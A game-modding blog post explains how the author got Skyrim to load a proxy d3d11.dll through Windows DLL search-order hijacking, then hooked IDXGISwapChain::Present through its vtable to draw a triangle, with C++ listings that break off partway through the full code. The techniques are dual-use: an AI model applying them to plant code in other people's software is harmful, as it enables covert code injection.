The blog of Kyle Halladay2021-07-13T03:56:09+00:00http://kylehalladay.comKyle Halladayk.mj.halladay@gmail.comHooking and Hijacking DirectX 11 Functions In Skyrim2021-07-14T00:00:00+00:00http://kylehalladay.com/blog/2021/07/14/Dll-Search-Order-Hijacking-For-PostProcess-Injection<style>
.collapsible {
padding: 10px;
background-color: #F0F0F0;
border-style: solid;
border-color: #333333;
border-width: 1px;
}
.collapsewrapper2 {
padding: 0px 0px 18px 0px;
}
</style>
<p>My last post was a deep dive into the nuts and bolts of how function hooking works, so for my next project I wanted to focus less on how hooking works, and more on how to use it to do something cool. I started looking at function hooking because I wanted to understand how <a href="https://reshade.me/">ReShade</a> works, so I decided that I’d take a baby step closer to that goal and draw a triangle across the screen in a real game. I’m a huge Skyrim fan, and it seemed like as good a candidate as any, so that’s what I went with.</p>
<p>This post is going to take it for granted that you already know how function hooking works. If you don’t, and that sounds interesting, see my <a href="/blog/2020/11/13/Hooking-By-Example.html">previous post</a>, or my <a href="https://github.com/khalladay/hooking-by-example">hooking-by-example</a> project.</p>
<div align="center">
<img src="/images/post_images/2021-07-14/skyrim_triangle.jpg" />
<font size="2">Note: if you're looking for modern C++, clean code, or best practices, turn back now</font>
<br /><br />
</div>
<p>As usual with things I write about, all the code for this project is up <a href="https://github.com/khalladay/triangle-injection">on github</a>, so if you just want to see the code, have at it!</p>
<h2 id="dll-hijacking-is-the-new-dll-injection">DLL Hijacking is the New DLL Injection</h2>
<p>I’ve built a few projects that have used process injection to get programs to run code they didn’t intend to, so for this project I decided to try something new. Instead of injecting a dll containing the code to draw a triangle, I decided to abuse Windows’ DLL search order to get Skyrim to load a dll full of my code during startup.</p>
<p>Whenever a program loads a DLL by name, it looks in a number of pre-set locations for that DLL, and loads the first one it finds. I knew that Skyrim uses DirectX 11 for its renderer, which means that it loads d3d11.dll during startup. My plan was to create my own dll, call it d3d11.dll, and place it in the same directory as Skyrim’s executable.</p>
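<p>To make the “first match wins” idea concrete, here is a minimal sketch of that kind of lookup. It is not how the Windows loader is implemented: the function name ResolveDll, the injected fileExists callback, and the example directories are all made up for illustration. It also assumes the application’s own directory is searched before the system directory, which is the usual default for a dll that isn’t on the system’s KnownDLLs list.</p>

```cpp
#include <cassert>
#include <functional>
#include <string>
#include <vector>

// Returns the full path of the first directory in searchOrder that contains
// dllName, or an empty string if no directory does.
// fileExists is injected so the sketch can run without touching the disk.
std::string ResolveDll(const std::vector<std::string>& searchOrder,
                       const std::string& dllName,
                       const std::function<bool(const std::string&)>& fileExists)
{
    assert(!dllName.empty());
    for (const std::string& dir : searchOrder)
    {
        const std::string candidate = dir + "\\" + dllName;
        if (fileExists(candidate))
        {
            return candidate; // first match wins, later directories are never checked
        }
    }
    return std::string();
}
```

<p>With a search order of game folder first and System32 second, the lookup returns the System32 copy of d3d11.dll until a file with the same name shows up in the game folder. From then on, the copy in the game folder is the one that gets loaded.</p>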
<p>This dll would sit in between the game code and the real version of d3d11.dll. For functions I didn’t want to add any additional sauce to, my code would call the real dll’s version of that function and return the result. In cases where I wanted to add my own logic, I could intercept any function call I wanted and insert that logic before or after calling the real D3D11.dll’s function. DLLs that do this are called “proxy” dlls. This isn’t a new idea by any means; there are tons of projects and literature out there for using proxy dlls for everything (including game hacking). Also I stole the idea from ReShade.</p>
<div align="center">
<img src="/images/post_images/2021-07-14/proxy_dll.png" />
<br /><br />
</div>
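<p>Stripped of everything Windows-specific, the proxy pattern in the diagram boils down to a function with the same signature as the real one that forwards the call and optionally does extra work around it. The sketch below uses made-up names (RealCreate, ProxyCreate, g_callCount) and a toy signature. In an actual proxy dll the pointer to the real function would come from loading the real library, not from a function in the same file.</p>

```cpp
#include <cassert>

// Signature shared by the "real" function and the proxy that wraps it.
using CreateFn = int (*)(int width, int height);

// Hypothetical stand-in for the function exported by the real library.
int RealCreate(int width, int height)
{
    return width * height;
}

// Pointer to the real function. Here it is set directly; a proxy dll would
// resolve it at runtime from the real library.
static CreateFn g_realCreate = &RealCreate;

// Something observable for the "extra logic" to change.
static int g_callCount = 0;

// The proxy: same signature as the real function, so callers can't tell the difference.
int ProxyCreate(int width, int height)
{
    assert(g_realCreate != nullptr);

    ++g_callCount;                                   // extra logic before the real call
    const int result = g_realCreate(width, height);  // forward to the real function
    // extra logic after the real call could inspect or modify result here
    return result;
}
```

<p>A caller that invokes ProxyCreate(4, 3) gets back exactly what RealCreate would have returned, and the proxy gets a chance to run its own code on either side of the call.</p>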
<p>Creating a proxy version of d3d11.dll that contains every function exported by the actual library is a chunk of work, but luckily I didn’t have to do that. Instead, I fired up <a href="https://ntcore.com/?page_id=388">CFF Explorer</a> and took a look at the functions Skyrim actually imports. It turns out this is just a single D3D11.dll export: D3D11CreateDeviceAndSwapChain. No complaints here.</p>
<p>I had never built a proxy dll before, so my first step was to make an empty one (with just a DllMain function), and see what happens if a program loads a dll that doesn’t have the functions it expects it to have. This works as well as you might expect. I put a call to MessageBox() in DllMain to see if things even progressed that far. They didn’t.</p>
<div align="center">
<img src="/images/post_images/2021-07-14/launching_with_dxgi_that_just_pops_messagebox.PNG" />
<font size="2">I changed my system's language to French once, some things have never changed back</font>
<br /><br />
</div>
<p>My next step was to try to write a proxy dll that didn’t do anything except forward all calls to D3D11CreateDeviceAndSwapChain to the real version of that function, and return the result. The goal here being that I could get Skyrim to load my dll (confirmed by a call to MessageBox in DLLMain), and run like normal. This is a relatively straightforward process. My .def file already declared that the proxy dll was exporting a function called D3D11CreateDeviceAndSwapChain, so all I had to do was create that function with the right type signature, and in the function body, load the real D3D11 library and call the real D3D11CreateDeviceAndSwapChain function.</p>
<figure class="highlight"><pre><code class="language-cpp" data-lang="cpp"><span class="k">typedef</span> <span class="nf">HRESULT</span><span class="p">(</span><span class="kr">__stdcall</span><span class="o">*</span> <span class="n">fn_D3D11CreateDeviceAndSwapChain</span><span class="p">)(</span>
<span class="n">IDXGIAdapter</span><span class="o">*</span><span class="p">,</span>
<span class="n">D3D_DRIVER_TYPE</span><span class="p">,</span>
<span class="n">HMODULE</span><span class="p">,</span>
<span class="n">UINT</span><span class="p">,</span>
<span class="k">const</span> <span class="n">D3D_FEATURE_LEVEL</span><span class="o">*</span><span class="p">,</span>
<span class="n">UINT</span><span class="p">,</span>
<span class="n">UINT</span><span class="p">,</span>
<span class="k">const</span> <span class="n">DXGI_SWAP_CHAIN_DESC</span><span class="o">*</span><span class="p">,</span>
<span class="n">IDXGISwapChain</span><span class="o">**</span><span class="p">,</span>
<span class="n">ID3D11Device</span><span class="o">**</span><span class="p">,</span>
<span class="n">D3D_FEATURE_LEVEL</span><span class="o">*</span><span class="p">,</span>
<span class="n">ID3D11DeviceContext</span><span class="o">**</span><span class="p">);</span>
<span class="n">fn_D3D11CreateDeviceAndSwapChain</span> <span class="nf">LoadD3D11AndGetOriginalFuncPointer</span><span class="p">()</span>
<span class="p">{</span>
<span class="kt">char</span> <span class="n">path</span><span class="p">[</span><span class="n">MAX_PATH</span><span class="p">];</span>
<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">GetSystemDirectoryA</span><span class="p">(</span><span class="n">path</span><span class="p">,</span> <span class="n">MAX_PATH</span><span class="p">))</span> <span class="k">return</span> <span class="nb">nullptr</span><span class="p">;</span>
<span class="n">strcat_s</span><span class="p">(</span><span class="n">path</span><span class="p">,</span> <span class="n">MAX_PATH</span> <span class="o">*</span> <span class="k">sizeof</span><span class="p">(</span><span class="kt">char</span><span class="p">),</span> <span class="s">"</span><span class="se">\\</span><span class="s">d3d11.dll"</span><span class="p">);</span>
<span class="n">HMODULE</span> <span class="n">d3d_dll</span> <span class="o">=</span> <span class="n">LoadLibraryA</span><span class="p">(</span><span class="n">path</span><span class="p">);</span>
<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">d3d_dll</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">MessageBox</span><span class="p">(</span><span class="nb">NULL</span><span class="p">,</span> <span class="n">TEXT</span><span class="p">(</span><span class="s">"Could Not Locate Original D3D11 DLL"</span><span class="p">),</span> <span class="n">TEXT</span><span class="p">(</span><span class="s">"Darn"</span><span class="p">),</span> <span class="mi">0</span><span class="p">);</span>
<span class="k">return</span> <span class="nb">nullptr</span><span class="p">;</span>
<span class="p">}</span>
<span class="c1">//GetProcAddress only accepts narrow (ANSI) names, so no TEXT() wrapper here</span>
<span class="k">return</span> <span class="p">(</span><span class="n">fn_D3D11CreateDeviceAndSwapChain</span><span class="p">)</span><span class="n">GetProcAddress</span><span class="p">(</span><span class="n">d3d_dll</span><span class="p">,</span> <span class="s">"D3D11CreateDeviceAndSwapChain"</span><span class="p">);</span>
<span class="p">}</span>
<span class="k">extern</span> <span class="s">"C"</span> <span class="n">HRESULT</span> <span class="kr">__stdcall</span> <span class="nf">D3D11CreateDeviceAndSwapChain</span><span class="p">(</span>
<span class="n">IDXGIAdapter</span> <span class="o">*</span> <span class="n">pAdapter</span><span class="p">,</span>
<span class="n">D3D_DRIVER_TYPE</span> <span class="n">DriverType</span><span class="p">,</span>
<span class="n">HMODULE</span> <span class="n">Software</span><span class="p">,</span>
<span class="n">UINT</span> <span class="n">Flags</span><span class="p">,</span>
<span class="k">const</span> <span class="n">D3D_FEATURE_LEVEL</span> <span class="o">*</span> <span class="n">pFeatureLevels</span><span class="p">,</span>
<span class="n">UINT</span> <span class="n">FeatureLevels</span><span class="p">,</span>
<span class="n">UINT</span> <span class="n">SDKVersion</span><span class="p">,</span>
<span class="k">const</span> <span class="n">DXGI_SWAP_CHAIN_DESC</span> <span class="o">*</span> <span class="n">pSwapChainDesc</span><span class="p">,</span>
<span class="n">IDXGISwapChain</span> <span class="o">*</span> <span class="o">*</span><span class="n">ppSwapChain</span><span class="p">,</span>
<span class="n">ID3D11Device</span> <span class="o">*</span> <span class="o">*</span><span class="n">ppDevice</span><span class="p">,</span>
<span class="n">D3D_FEATURE_LEVEL</span> <span class="o">*</span> <span class="n">pFeatureLevel</span><span class="p">,</span>
<span class="n">ID3D11DeviceContext</span> <span class="o">*</span> <span class="o">*</span><span class="n">ppImmediateContext</span>
<span class="p">)</span>
<span class="p">{</span>
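<span class="n">fn_D3D11CreateDeviceAndSwapChain</span> <span class="n">D3D11CreateDeviceAndSwapChain_Orig</span> <span class="o">=</span> <span class="n">LoadD3D11AndGetOriginalFuncPointer</span><span class="p">();</span>
<span class="c1">//bail out if the real dll or its export could not be found</span>
<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">D3D11CreateDeviceAndSwapChain_Orig</span><span class="p">)</span> <span class="k">return</span> <span class="n">E_FAIL</span><span class="p">;</span>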
<span class="n">HRESULT</span> <span class="n">res</span> <span class="o">=</span> <span class="n">D3D11CreateDeviceAndSwapChain_Orig</span><span class="p">(</span>
<span class="n">pAdapter</span><span class="p">,</span>
<span class="n">DriverType</span><span class="p">,</span>
<span class="n">Software</span><span class="p">,</span>
<span class="n">Flags</span><span class="p">,</span>
<span class="n">pFeatureLevels</span><span class="p">,</span>
<span class="n">FeatureLevels</span><span class="p">,</span>
<span class="n">SDKVersion</span><span class="p">,</span>
<span class="n">pSwapChainDesc</span><span class="p">,</span>
<span class="n">ppSwapChain</span><span class="p">,</span>
<span class="n">ppDevice</span><span class="p">,</span>
<span class="n">pFeatureLevel</span><span class="p">,</span>
<span class="n">ppImmediateContext</span><span class="p">);</span>
<span class="k">return</span> <span class="n">res</span><span class="p">;</span>
<span class="p">}</span>
<span class="n">BOOL</span> <span class="n">WINAPI</span> <span class="nf">DllMain</span><span class="p">(</span><span class="n">HINSTANCE</span> <span class="n">hinstDLL</span><span class="p">,</span> <span class="n">DWORD</span> <span class="n">ul_reason_for_call</span><span class="p">,</span> <span class="n">LPVOID</span> <span class="n">lpvReserved</span><span class="p">)</span>
<span class="p">{</span>
<span class="k">if</span> <span class="p">(</span><span class="n">ul_reason_for_call</span> <span class="o">==</span> <span class="n">DLL_PROCESS_ATTACH</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">MessageBox</span><span class="p">(</span><span class="nb">NULL</span><span class="p">,</span> <span class="n">TEXT</span><span class="p">(</span><span class="s">"Loaded Proxy DLL"</span><span class="p">),</span> <span class="n">TEXT</span><span class="p">(</span><span class="s">"Success"</span><span class="p">),</span> <span class="mi">0</span><span class="p">);</span>
<span class="p">}</span>
<span class="k">return</span> <span class="nb">true</span><span class="p">;</span>
<span class="p">}</span></code></pre></figure>
<p>I pasted the dll built from this code next to the Skyrim binary (for me: C:\Program Files (x86)\Steam\steamapps\common\Skyrim Special Edition) and launched the game through Steam. The message box popped up, and the game proceeded to play like normal. Perfect.</p>
<h2 id="finding-a-function-to-hook">Finding A Function To Hook</h2>
<p>Now that I had my proxy dll minimally working, it was time to use it to do something interesting. I figured it would be pretty easy to add some more code to D3D11CreateDeviceAndSwapChain to set up all the buffers and shaders needed to render a triangle, and then intercept a call to IDXGISwapChain::Present to insert a draw call for that triangle at the end of a frame. There was just one small problem: I had no idea what the address of IDXGISwapChain::Present was, and this is where things take a turn for the hacky.</p>
<p>IDXGISwapChain isn’t really a class, it’s a COM interface. The ppSwapChain pointer returned by D3D11CreateDeviceAndSwapChain is a pointer to <em>something</em> that implements said interface, but you never get to see the actual concrete type pointed to by that pointer, so I couldn’t just make a function pointer to the concrete implementation of Present(). The one saving grace in all this is that I knew that whatever ppSwapChain pointed to, it had a vtable. Somewhere in memory, I already had a pointer to the Present function, I just needed to figure out how to get it.</p>
<p>First, I needed to get a pointer to the vtable for the swapchain that gets created by the call to CreateDeviceAndSwapChain. This meant adding the following perfectly reasonable line of code to my proxy CreateDeviceAndSwapChain function (right before the return statement):</p>
<figure class="highlight"><pre><code class="language-cpp" data-lang="cpp"><span class="kt">void</span><span class="o">**</span> <span class="n">swapChainVTable</span> <span class="o">=</span> <span class="o">*</span><span class="k">reinterpret_cast</span><span class="o"><</span><span class="kt">void</span><span class="o">***></span><span class="p">(</span><span class="o">*</span><span class="n">ppSwapChain</span><span class="p">);</span> </code></pre></figure>
<p>Then I threw a breakpoint right after that line so I could see the value of swapChainVTable in the VS debugger. By itself, this isn’t super helpful, since it’s just a pointer to the first element in the vtable, but in the course of doing this I learned a new Visual Studio trick to help out here. If you add a watch for a variable, and then add a suffix to the name of that watch like “, 50”, Visual Studio will give you a debug view that assumes swapChainVTable is a pointer to an array, and show you the next 50 elements in that array. So I created a watch for “swapChainVTable,50” which showed me the first 50 pointers in the swapchain object’s vtable.</p>
<div align="center">
<img src="/images/post_images/2021-07-14/nosymbol_watchwindow.png" />
<br /><br />
</div>
<p>This by itself wasn’t the most useful (although I guess I could have figured out the right function by trial and error). Microsoft publishes the symbols for D3D11.dll though, so I had VS grab those from the Microsoft symbol server and used them to get the function names that corresponded with the vtable memory addresses. Once I had that, I could see that the Present function is the 9th element in the swapchain’s vtable (index 8, counting from zero).</p>
<p><del>Of course, Microsoft could update DXGI and change the ordering of functions in the vtable at any time, but it works for now, so yolo. </del> [Edit: As @__silent_ pointed out <a href="https://twitter.com/__silent_/status/1414704439693398023">on twitter</a>, this is rather unlikely, since it would require a whole new DXGI SwapChain interface that didn’t inherit from any previous versions of IDXGISwapChain]</p>
<div align="center">
<img src="/images/post_images/2021-07-14/symbolicated_watchwindow.png" />
<br /><br />
</div>
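<p>If the “object starts with a pointer to a table of function pointers” layout is hard to picture, the following toy model may help. It is only a sketch: FakeSwapChain, FakePresent, and the nine-slot table are invented stand-ins, not the real DXGI types, and the only detail borrowed from the post is that Present sits in the 9th slot (index 8).</p>

```cpp
#include <cassert>
#include <cstddef>

// Every slot is stored as a generic function pointer and cast back to its
// real type before being called.
using Slot = void (*)();

// Hypothetical stand-in for a COM object: its first member points at the
// table of function pointers (the vtable).
struct FakeSwapChain
{
    const Slot* vtable;
    int framesPresented;
};

using PresentFn = int (*)(FakeSwapChain*, unsigned, unsigned);

// Toy "Present": counts how many frames have been presented.
int FakePresent(FakeSwapChain* self, unsigned /*syncInterval*/, unsigned /*flags*/)
{
    return ++self->framesPresented;
}

// Placeholder for the eight methods that come before Present.
void Unused() {}

constexpr std::size_t kSlotCount = 9;
constexpr std::size_t kPresentIndex = 8; // 9th entry, counting from zero

const Slot g_vtable[kSlotCount] = {
    &Unused, &Unused, &Unused, &Unused,
    &Unused, &Unused, &Unused, &Unused,
    reinterpret_cast<Slot>(&FakePresent)
};

// Reads the table pointer out of the object and returns the Present slot.
PresentFn GetPresent(FakeSwapChain* swapChain)
{
    assert(swapChain != nullptr && swapChain->vtable != nullptr);
    const Slot* table = swapChain->vtable;
    return reinterpret_cast<PresentFn>(table[kPresentIndex]);
}
```

<p>The address that GetPresent returns plays the same role as swapChainVTable[8] in the real code: it is the location of the function that a hook needs to redirect.</p>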
<p>Once I had the actual address, I could re-use the hooking code from my last post and redirect all calls to Present to my own function, which I could use to issue a draw call for the custom triangle prior to actually calling Present().</p>
<figure class="highlight"><pre><code class="language-cpp" data-lang="cpp"><span class="n">HRESULT</span> <span class="nf">DXGISwapChain_Present_Hook</span><span class="p">(</span><span class="n">IDXGISwapChain</span><span class="o">*</span> <span class="n">thisPtr</span><span class="p">,</span> <span class="n">UINT</span> <span class="n">SyncInterval</span><span class="p">,</span> <span class="n">UINT</span> <span class="n">Flags</span><span class="p">)</span>
<span class="p">{</span>
<span class="c1">//triangle drawing code will go here</span>
<span class="c1">//this is a specific quirk of my hooking code,</span>
<span class="c1">//the address for the function being hooked is stored in a thread-local stack,</span>
<span class="c1">//Getting the address of the original function means calling PopAddress.</span>
<span class="c1">//more details in the "Hooking By Example" project on my github</span>
<span class="n">fn_DXGISwapChain_Present</span> <span class="n">DXGISwapChain_Present_Orig</span><span class="p">;</span>
<span class="n">PopAddress</span><span class="p">(</span><span class="kt">uint64_t</span><span class="p">(</span><span class="o">&</span><span class="n">DXGISwapChain_Present_Orig</span><span class="p">));</span>
<span class="c1">//actually call Present</span>
<span class="n">HRESULT</span> <span class="n">r</span> <span class="o">=</span> <span class="n">DXGISwapChain_Present_Orig</span><span class="p">(</span><span class="n">thisPtr</span><span class="p">,</span> <span class="n">SyncInterval</span><span class="p">,</span> <span class="n">Flags</span><span class="p">);</span>
<span class="k">return</span> <span class="n">r</span><span class="p">;</span>
<span class="p">}</span>
<span class="k">extern</span> <span class="s">"C"</span> <span class="n">HRESULT</span> <span class="kr">__stdcall</span> <span class="nf">D3D11CreateDeviceAndSwapChain</span><span class="p">(</span>
<span class="n">IDXGIAdapter</span> <span class="o">*</span> <span class="n">pAdapter</span><span class="p">,</span>
<span class="n">D3D_DRIVER_TYPE</span> <span class="n">DriverType</span><span class="p">,</span>
<span class="n">HMODULE</span> <span class="n">Software</span><span class="p">,</span>
<span class="n">UINT</span> <span class="n">Flags</span><span class="p">,</span>
<span class="k">const</span> <span class="n">D3D_FEATURE_LEVEL</span> <span class="o">*</span> <span class="n">pFeatureLevels</span><span class="p">,</span>
<span class="n">UINT</span> <span class="n">FeatureLevels</span><span class="p">,</span>
<span class="n">UINT</span> <span class="n">SDKVersion</span><span class="p">,</span>
<span class="k">const</span> <span class="n">DXGI_SWAP_CHAIN_DESC</span> <span class="o">*</span> <span class="n">pSwapChainDesc</span><span class="p">,</span>
<span class="n">IDXGISwapChain</span> <span class="o">*</span> <span class="o">*</span><span class="n">ppSwapChain</span><span class="p">,</span>
<span class="n">ID3D11Device</span> <span class="o">*</span> <span class="o">*</span><span class="n">ppDevice</span><span class="p">,</span>
<span class="n">D3D_FEATURE_LEVEL</span> <span class="o">*</span> <span class="n">pFeatureLevel</span><span class="p">,</span>
<span class="n">ID3D11DeviceContext</span> <span class="o">*</span> <span class="o">*</span><span class="n">ppImmediateContext</span>
<span class="p">)</span>
<span class="p">{</span>
<span class="n">fn_D3D11CreateDeviceAndSwapChain</span> <span class="n">D3D11CreateDeviceAndSwapChain_Orig</span> <span class="o">=</span> <span class="n">LoadD3D11AndGetOriginalFuncPointer</span><span class="p">();</span>
<span class="n">HRESULT</span> <span class="n">res</span> <span class="o">=</span> <span class="n">D3D11CreateDeviceAndSwapChain_Orig</span><span class="p">(</span><span class="n">pAdapter</span><span class="p">,</span> <span class="n">DriverType</span><span class="p">,</span> <span class="n">Software</span><span class="p">,</span> <span class="n">Flags</span><span class="p">,</span> <span class="n">pFeatureLevels</span><span class="p">,</span> <span class="n">FeatureLevels</span><span class="p">,</span> <span class="n">SDKVersion</span><span class="p">,</span> <span class="n">pSwapChainDesc</span><span class="p">,</span> <span class="n">ppSwapChain</span><span class="p">,</span> <span class="n">ppDevice</span><span class="p">,</span> <span class="n">pFeatureLevel</span><span class="p">,</span> <span class="n">ppImmediateContext</span><span class="p">);</span>
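<span class="c1">//only touch the swapchain if creation succeeded and the caller asked for one</span>
<span class="k">if</span> <span class="p">(</span><span class="n">SUCCEEDED</span><span class="p">(</span><span class="n">res</span><span class="p">)</span> <span class="o">&&</span> <span class="n">ppSwapChain</span> <span class="o">&&</span> <span class="o">*</span><span class="n">ppSwapChain</span><span class="p">)</span>
<span class="p">{</span>
<span class="kt">void</span><span class="o">**</span> <span class="n">swapChainVTable</span> <span class="o">=</span> <span class="o">*</span><span class="k">reinterpret_cast</span><span class="o"><</span><span class="kt">void</span><span class="o">***></span><span class="p">(</span><span class="o">*</span><span class="n">ppSwapChain</span><span class="p">);</span>
<span class="c1">//redirects calls to swapChainVTable[8] to DXGISwapChain_Present_Hook</span>
<span class="c1">//for more details about hooking, see my previous blog post</span>
<span class="n">InstallHook</span><span class="p">(</span><span class="n">swapChainVTable</span><span class="p">[</span><span class="mi">8</span><span class="p">],</span> <span class="n">DXGISwapChain_Present_Hook</span><span class="p">);</span>
<span class="p">}</span>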
<span class="k">return</span> <span class="n">res</span><span class="p">;</span>
<span class="p">}</span></code></pre></figure>
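<p>The PopAddress call in the hook is the least obvious part of the listing above, so here is a rough sketch of how a thread-local address stack like that could work. This is a guess at the general shape based only on the comments in the hook, not a copy of the real hooking code: the body of PushAddress and PopAddress, the g_addressStack variable, and OriginalFunction are all assumptions made for illustration, and the sketch assumes 64-bit pointers.</p>

```cpp
#include <cassert>
#include <cstdint>
#include <cstring>
#include <vector>

static_assert(sizeof(void (*)()) == sizeof(std::uint64_t),
              "sketch assumes 64-bit pointers");

// One stack per thread, so hooks running on different threads don't
// overwrite each other's saved addresses.
thread_local std::vector<std::uint64_t> g_addressStack;

// Assumed to be called by whatever redirects execution into the hook,
// with the address needed to reach the original function.
void PushAddress(std::uint64_t address)
{
    g_addressStack.push_back(address);
}

// destination is the address of a function pointer variable, passed as an
// integer. The most recently pushed address is written into that variable.
void PopAddress(std::uint64_t destination)
{
    assert(!g_addressStack.empty());
    const std::uint64_t address = g_addressStack.back();
    g_addressStack.pop_back();
    std::memcpy(reinterpret_cast<void*>(destination), &address, sizeof(address));
}

// Hypothetical "original" function that a hook would want to call.
int OriginalFunction(int x)
{
    return x + 1;
}
```

<p>Under these assumptions, a hook declares an uninitialized function pointer, passes its address to PopAddress, and can then call the original function through it, which matches the pattern used in DXGISwapChain_Present_Hook.</p>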
<h2 id="actually-drawing-a-triangle">Actually Drawing a Triangle</h2>
<p>Once I had the IDXGISwapChain::Present hook working, the rest of this project fell into place pretty quickly. I added all the normal D3D11 calls for creating a mesh, compiling shaders, etc. to CreateDeviceAndSwapChain (after device creation), and then added the draw commands for the triangle to the Present hook, before having that hook call the regular Present function. Rather than try to shove HLSL code in my cpp files, I just had the code look for a folder called “hook_content” in the same directory as the hooked binary, and load the shaders from there. Yet another idea I stole from <a href="https://reshade.me/">ReShade</a>.</p>
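<p>The “look next to the hooked binary” step is just string manipulation on the executable’s path. A minimal, portable sketch of it is below. HookContentPath is a made-up helper name and the example paths are hypothetical; the full listing does the same job with GetModuleFileNameA, PathRemoveFileSpecA and strcat_s.</p>

```cpp
#include <cassert>
#include <string>

// Given the full path of the hooked executable, builds the path of a file
// inside the hook_content folder that sits next to it.
std::string HookContentPath(const std::string& exePath, const std::string& fileName)
{
    assert(!fileName.empty());

    // Strip the executable's file name, keeping only its directory.
    const std::string::size_type lastSlash = exePath.find_last_of("\\/");
    const std::string directory = (lastSlash == std::string::npos)
        ? std::string(".")                 // no directory part: use the current directory
        : exePath.substr(0, lastSlash);

    return directory + "\\hook_content\\" + fileName;
}
```

<p>For an executable at C:\Games\Skyrim\SkyrimSE.exe, asking for passthrough_vs.shader yields C:\Games\Skyrim\hook_content\passthrough_vs.shader, so the shaders travel with the game folder and don’t need to be baked into the dll.</p>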
<p>The resulting code is simple enough to be a D3D11 tutorial project, so I’m just going to paste it below for reference and not waste much time talking about it. I’ve included all the hooking code too. As mentioned, the entire project (including the test d3d11 app I built) is also <a href="https://github.com/khalladay/triangle-injection">on github</a>.</p>
<div class="collapsewrapper2">
<details class="collapsible">
<summary>Full DX11 Hooking Code (Click To Expand)</summary>
<figure class="highlight"><pre><code class="language-cpp" data-lang="cpp"><span class="cp">#pragma once
#include <Windows.h>
#include "debug.h"
#include <stdint.h>
#include <d3dcompiler.h>
#include <d3d11.h>
#include <d3d11_4.h>
#include <shlwapi.h>
#include "hooking.h"
</span>
<span class="cp">#pragma comment (lib, "Shlwapi.lib") //for PathRemoveFileSpecA
#pragma comment(lib, "d3dcompiler.lib")
</span>
<span class="k">typedef</span> <span class="nf">HRESULT</span><span class="p">(</span><span class="kr">__stdcall</span><span class="o">*</span> <span class="n">fn_D3D11CreateDeviceAndSwapChain</span><span class="p">)(</span>
<span class="n">IDXGIAdapter</span><span class="o">*</span><span class="p">,</span>
<span class="n">D3D_DRIVER_TYPE</span><span class="p">,</span>
<span class="n">HMODULE</span><span class="p">,</span>
<span class="n">UINT</span><span class="p">,</span>
<span class="k">const</span> <span class="n">D3D_FEATURE_LEVEL</span><span class="o">*</span><span class="p">,</span>
<span class="n">UINT</span><span class="p">,</span>
<span class="n">UINT</span><span class="p">,</span>
<span class="k">const</span> <span class="n">DXGI_SWAP_CHAIN_DESC</span><span class="o">*</span><span class="p">,</span>
<span class="n">IDXGISwapChain</span><span class="o">**</span><span class="p">,</span>
<span class="n">ID3D11Device</span><span class="o">**</span><span class="p">,</span>
<span class="n">D3D_FEATURE_LEVEL</span><span class="o">*</span><span class="p">,</span>
<span class="n">ID3D11DeviceContext</span><span class="o">**</span><span class="p">);</span>
<span class="k">typedef</span> <span class="nf">HRESULT</span><span class="p">(</span><span class="kr">__stdcall</span><span class="o">*</span> <span class="n">fn_DXGISwapChain_Present</span><span class="p">)(</span><span class="n">IDXGISwapChain</span><span class="o">*</span><span class="p">,</span> <span class="n">UINT</span><span class="p">,</span> <span class="n">UINT</span><span class="p">);</span>
<span class="n">IDXGISwapChain</span><span class="o">*</span> <span class="n">swapChain</span> <span class="o">=</span> <span class="nb">nullptr</span><span class="p">;</span>
<span class="n">ID3D11Device5</span><span class="o">*</span> <span class="n">device</span> <span class="o">=</span> <span class="nb">nullptr</span><span class="p">;</span>
<span class="n">ID3D11DeviceContext4</span><span class="o">*</span> <span class="n">devCon</span> <span class="o">=</span> <span class="nb">nullptr</span><span class="p">;</span>
<span class="n">ID3D10Blob</span><span class="o">*</span> <span class="n">vs_blob</span> <span class="o">=</span> <span class="nb">nullptr</span><span class="p">;</span>
<span class="n">ID3D11VertexShader</span><span class="o">*</span> <span class="n">vs</span> <span class="o">=</span> <span class="nb">nullptr</span><span class="p">;</span>
<span class="n">ID3D10Blob</span><span class="o">*</span> <span class="n">ps_blob</span> <span class="o">=</span> <span class="nb">nullptr</span><span class="p">;</span>
<span class="n">ID3D11PixelShader</span><span class="o">*</span> <span class="n">ps</span> <span class="o">=</span> <span class="nb">nullptr</span><span class="p">;</span>
<span class="n">ID3D11Buffer</span><span class="o">*</span> <span class="n">vertex_buffer</span> <span class="o">=</span> <span class="nb">nullptr</span><span class="p">;</span>
<span class="n">ID3D11InputLayout</span><span class="o">*</span> <span class="n">vertLayout</span> <span class="o">=</span> <span class="nb">nullptr</span><span class="p">;</span>
<span class="n">ID3D11RasterizerState</span><span class="o">*</span> <span class="n">SolidRasterState</span> <span class="o">=</span> <span class="nb">nullptr</span><span class="p">;</span>
<span class="n">ID3D11DepthStencilState</span><span class="o">*</span> <span class="n">SolidDepthStencilState</span> <span class="o">=</span> <span class="nb">nullptr</span><span class="p">;</span>
<span class="n">HRESULT</span> <span class="nf">DXGISwapChain_Present_Hook</span><span class="p">(</span><span class="n">IDXGISwapChain</span><span class="o">*</span> <span class="n">thisPtr</span><span class="p">,</span> <span class="n">UINT</span> <span class="n">SyncInterval</span><span class="p">,</span> <span class="n">UINT</span> <span class="n">Flags</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">devCon</span><span class="o">-></span><span class="n">VSSetShader</span><span class="p">(</span><span class="n">vs</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">0</span><span class="p">);</span>
<span class="n">devCon</span><span class="o">-></span><span class="n">PSSetShader</span><span class="p">(</span><span class="n">ps</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">0</span><span class="p">);</span>
<span class="n">devCon</span><span class="o">-></span><span class="n">IASetInputLayout</span><span class="p">(</span><span class="n">vertLayout</span><span class="p">);</span>
<span class="n">devCon</span><span class="o">-></span><span class="n">RSSetState</span><span class="p">(</span><span class="n">SolidRasterState</span><span class="p">);</span>
<span class="n">devCon</span><span class="o">-></span><span class="n">OMSetDepthStencilState</span><span class="p">(</span><span class="n">SolidDepthStencilState</span><span class="p">,</span> <span class="mi">0</span><span class="p">);</span>
<span class="n">UINT</span> <span class="n">stride</span> <span class="o">=</span> <span class="k">sizeof</span><span class="p">(</span><span class="kt">float</span><span class="p">)</span> <span class="o">*</span> <span class="mi">6</span><span class="p">;</span>
